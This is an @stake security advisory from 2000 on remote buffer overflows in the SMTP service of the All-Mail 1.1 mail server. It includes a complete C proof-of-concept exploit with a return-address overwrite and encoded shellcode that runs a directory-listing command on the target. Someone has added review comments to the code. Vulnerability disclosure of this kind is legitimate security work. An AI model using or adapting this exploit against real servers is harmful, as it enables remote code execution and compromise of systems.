
Title: All-Mail buffer overrun vulnerability
Released by: @stake
Date: 12th October 2000
-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1





                              @stake Inc.

                            www.atstake.com



                           Security Advisory



Advisory Name: All-Mail buffer overrun vulnerability

 Release Date: 10/12/2000

  Application: Nevis Systems All-Mail 1.1

     Platform: Windows NT 4.0 / 2000

     Severity: There are several buffer overflow conditions

               that could result in execution of arbitrary

               code or a denial of service.

      Authors: David Litchfield [dlitchfield@atstake.com]

Vendor Status: Vendor alerted - details below.

          Web: www.atstake.com/research/advisories/2000/a101200-2.txt





Overview:



Nevis Systems' All-Mail (http://www.n-systems.com/) is a personal
and small office mail server written for the Windows platform. There are
various buffer overrun vulnerabilities in this server that can allow a
remote attacker to gain complete control of the server's execution and
execute arbitrary computer code.



There are several methods that can be used to overflow various static
buffers in the SMTP component of the server, for example an overly
long "mail from" or "rcpt to" command.



Proof of Concept



The following code will connect to TCP port 25 on the remote system and

then cause the overflow. The code executed here simply spawns a shell,

performs a directory listing and pipes the output to a file called

"allmail_orun.txt" on the target system. This will allow users to check if

their mail server is vulnerable by testing for the file.



Cut --------8<----------------------



#include 

#include 

#include 

#include 



// Shared Winsock state.  startWSOCK() fills he and the address part of sa,
// DoBufferOverrun() adds the port and opens sock; main() fills hostname.
struct sockaddr_in sa;       // target address (sin_addr/sin_family from startWSOCK, sin_port from DoBufferOverrun)
struct hostent *he;          // gethostbyname() result for the target host
SOCKET sock;                 // the single TCP connection to port 25
char hostname[256] = {0};    // argv[1] copy; zero-filled so the bounded strncpy() in main() leaves it terminated



// Entry point of the All-Mail 1.1 overrun test tool.  argv[1] is the host
// to test.  Builds the "mail from" argument in buffer[]: a filler string,
// a 4-byte saved-return-address overwrite at indices 242-245, nine NOPs,
// a short decoder stub and the +1-encoded command bytes; then resolves the
// host with startWSOCK() and hands the buffer to DoBufferOverrun().
// Returns 0 on every path, including the usage and Winsock-error paths.
// NOTE(review): startWSOCK() and DoBufferOverrun() are defined further
// down without prototypes, so they are implicitly declared here (invalid
// since C99).  The #include lines above also lost their header names in
// this copy of the advisory.
int main(int argc, char *argv[])
{
// chk is never used; count indexes the next free byte of buffer[].
int chk=0,count=0;
// Filler that reaches the saved return address.  The remaining bytes of
// buffer[500] are zero-filled by the initialiser.  (The literal appears
// split across lines here only because of the advisory's line wrapping.)
char
buffer[500]="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPP
PQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ11112222333344445555666677778888999
90000aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrr
rssssttttuuuuvvvvwwwwxxxxyy";
// No host argument: print usage and exit 0.  Extra arguments are ignored.
if(argc == 1)
{
printf("\n\tUsage: C:\\>%s host\n\tTests for
All-Mail buffer overflow\n\tDavid Litchfield 10th October
2000\n\n",argv[0]);
return 0;
}
// hostname[] is 256 bytes and zero-initialised, so the 250-byte bound keeps
// it NUL-terminated even for an over-long argument.
strncpy(hostname,argv[1],250);
// Overwrite the saved return address with 0x77F32836
// This address contains a JMP ESP instruction that
// when executed will land us back in our buffer
buffer[242]=0x36;
buffer[243]=0x28;
buffer[244]=0xF3;
buffer[245]=0x77;
// Everything from here on is appended directly after the return address.
count = 246;
// This part of the buffer gets zapped - just put NOPs in
buffer[count++]=0x90;
buffer[count++]=0x90;
buffer[count++]=0x90;
buffer[count++]=0x90;
buffer[count++]=0x90;
buffer[count++]=0x90;
buffer[count++]=0x90;
buffer[count++]=0x90;
buffer[count++]=0x90;
// This is where our code starts in earnest
// mov esp,ebp
buffer[count++]=0x8B;
buffer[count++]=0xEC;
// With our stack preserved and our code safe we continue
// mov ebx,esp
buffer[count++]=0x8B;
buffer[count++]=0xDC;
// mov eax,77F1A986h
buffer[count++]=0xB8;
buffer[count++]=0x86;
buffer[count++]=0xA9;
buffer[count++]=0xF1;
buffer[count++]=0x77;
// xor esi,esi
buffer[count++]=0x33;
buffer[count++]=0xF6;
// push esi
buffer[count++]=0x56;
// mov ecx, 0xFFFFFFFF
buffer[count++]=0xB9;
buffer[count++]=0xFF;
buffer[count++]=0xFF;
buffer[count++]=0xFF;
buffer[count++]=0xFF;
// sub ecx, 0x0D7
buffer[count++]=0x83;
buffer[count++]=0xE9;
buffer[count++]=0xD7;
// loophere:
// sub dword ptr[ebx+0x50],1
buffer[count++]=0x83;
buffer[count++]=0x6B;
buffer[count++]=0x50;
buffer[count++]=0x01;
// sub ebx,1
buffer[count++]=0x83;
buffer[count++]=0xEB;
buffer[count++]=0x01;
// sub ecx,1
buffer[count++]=0x83;
buffer[count++]=0xE9;
buffer[count++]=0x01;
// test ecx,ecx
buffer[count++]=0x85;
buffer[count++]=0xC9;
// jne loophere
buffer[count++]=0x75;
buffer[count++]=0xF2;
// add ebx,0x55
buffer[count++]=0x83;
buffer[count++]=0xC3;
buffer[count++]=0x55;
// push ebx 
buffer[count++]=0x53;
// call eax
buffer[count++]=0xFF;
buffer[count++]=0xD0;
// This bunch is our command to run:
// cmd.exe /c dir > allmail_orun.txt
// but with 1 added to every character
// which is SUBed in the loop above
// (the leading and trailing 0x01 bytes decode to 0x00, so the command
// ends up NUL-terminated for the callee)
buffer[count++]=0x01;
buffer[count++]=0x01;
buffer[count++]=0x01;
buffer[count++]=0x01;
buffer[count++]=0x64;
buffer[count++]=0x6e;
buffer[count++]=0x65;
buffer[count++]=0x2f;
buffer[count++]=0x66;
buffer[count++]=0x79;
buffer[count++]=0x66;
buffer[count++]=0x21;
buffer[count++]=0x30;
buffer[count++]=0x64;
buffer[count++]=0x21;
buffer[count++]=0x65;
buffer[count++]=0x6a;
buffer[count++]=0x73;
buffer[count++]=0x21;
buffer[count++]=0x3f;
buffer[count++]=0x21;
buffer[count++]=0x62;
buffer[count++]=0x6d;
buffer[count++]=0x6d;
buffer[count++]=0x6e;
buffer[count++]=0x62;
buffer[count++]=0x6a;
buffer[count++]=0x6d;
buffer[count++]=0x60;
buffer[count++]=0x70;
buffer[count++]=0x73;
buffer[count++]=0x76;
buffer[count++]=0x6f;
buffer[count++]=0x2f;
buffer[count++]=0x75;
buffer[count++]=0x79;
buffer[count++]=0x75;
buffer[count++]=0x01;
buffer[count++]=0x01;
buffer[count++]=0x01;
// count now stands at 335 (246 + 9 + 40 + 40), well inside buffer[500].
// The bytes after it are still zero, which is what terminates the
// strlen() that DoBufferOverrun() uses to size the send.
// Initialise Winsock and resolve the host; any non-zero code is a failure.
if(startWSOCK(hostname)!=0)
{
printf("Winsock Error!\n");
return 0;
}
// Connect to port 25 and send the buffer as the "mail from" argument.
DoBufferOverrun(buffer);
return 0;
}







// Initialise Winsock 2.0 and resolve swhost into the globals he and sa
// (sin_family and sin_addr only; the port is set by the caller's peer).
// Returns 0 on success, 2 if WSAStartup() fails, 3 if the negotiated
// version is not 2.0 (Winsock is cleaned up first), or 4 if the host does
// not resolve.  On the 2 and 4 paths WSACleanup() is not called.
int startWSOCK(char *swhost)
{
WSADATA wsaData;
WORD wanted = MAKEWORD( 2, 0 );

if ( WSAStartup( wanted, &wsaData ) != 0 )
{
return 2;
}

// Anything other than exactly 2.0 is rejected.
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
{
WSACleanup( );
return 3;
}

he = gethostbyname(swhost);
if (he == NULL)
{
printf("Host not found..");
return 4;
}

// Fill the address; INADDR_ANY is immediately replaced by the resolved
// address, so only sin_family and the memcpy'd sin_addr matter.
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=INADDR_ANY;
memcpy(&sa.sin_addr,he->h_addr,he->h_length);

return 0;
}



// Open a TCP connection to port 25 of the host that startWSOCK() resolved
// into the global sa, check the greeting/HELO exchange for the All-Mail
// reply string, and send exploit as the argument of "mail from:".
// Always returns 0; every failure is reported only through printf().
// NOTE(review): snd and rcv are assigned but never checked, and count,
// incount and err are unused.
int DoBufferOverrun(char *exploit)
{
int snd, rcv, err, count =0,incount = 0; 
char resp[200],*loc=NULL;
sa.sin_port=htons(25);
sock=socket(AF_INET,SOCK_STREAM,0);
// NOTE(review): bind() runs before the INVALID_SOCKET check and its result
// is ignored; sa holds the remote address at this point, so this bind
// presumably fails and has no effect.  The connect() below is what matters.
bind(sock,(struct sockaddr *)&sa,sizeof(sa));
if (sock==INVALID_SOCKET)
{
// closesocket() on an invalid handle is redundant here but harmless.
closesocket(sock);
return 0;
}
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) < 0)
{
closesocket(sock);
printf("Failed to connect\n");
return 0;
}
else
{
// Read the banner, send HELO, read the reply.
// NOTE(review): resp is never NUL-terminated after recv(), so the strstr()
// below can read past its 200 bytes if the reply is long or recv() fails;
// a short or failed recv() also goes unchecked.
rcv = recv(sock,resp,200,0);
snd = send(sock,"helo
all-mail.overrun.test\r\n",28,0);
rcv = recv(sock,resp,200,0);
// The HELO reply text is used as the fingerprint for All-Mail.
loc = strstr(resp,"250 HELO accepted");
if(loc == NULL)
{
printf("Server does not appear to be
running All-Mail\nAborting...");
closesocket(sock);
return 0;
}
else
{
// "mail from: <" + exploit + ">\r\n"; the payload length comes from
// strlen(), so exploit must be NUL-terminated and NUL-free up to its end.
snd = send(sock,"mail from:
<",12,0);
snd =
send(sock,exploit,strlen(exploit),0);
snd = send(sock,">\r\n",3,0);
// No reply is read after the payload; success is assumed.
printf("Payload
sent...allmail_orun.txt should have been created.\n");
}
}
closesocket(sock);
return 0;
}



Cut -------8<---------





Vendor Response:



When informed of these issues, the vendor decided not to support
this product any longer and stated that they will inform their customers of
what they should do.



Recommendation:



Switch to another mail server, as there will not be a fixed version
available.





For more advisories: http://www.atstake.com/research/index.html

PGP Key: http://www.atstake.com/research/pgp_key.asc



Copyright 2000 @stake, Inc. All rights reserved.





-----BEGIN PGP SIGNATURE-----

Version: PGP 7.0



iQA/AwUBOeXgbFESXwDtLdMhEQK7UACg5BBYYKzDSnXb6JnuffskVKGn2pUAoI1G

9TODImPMfmu4v87sWkw2sLjd

=YZd9

-----END PGP SIGNATURE-----







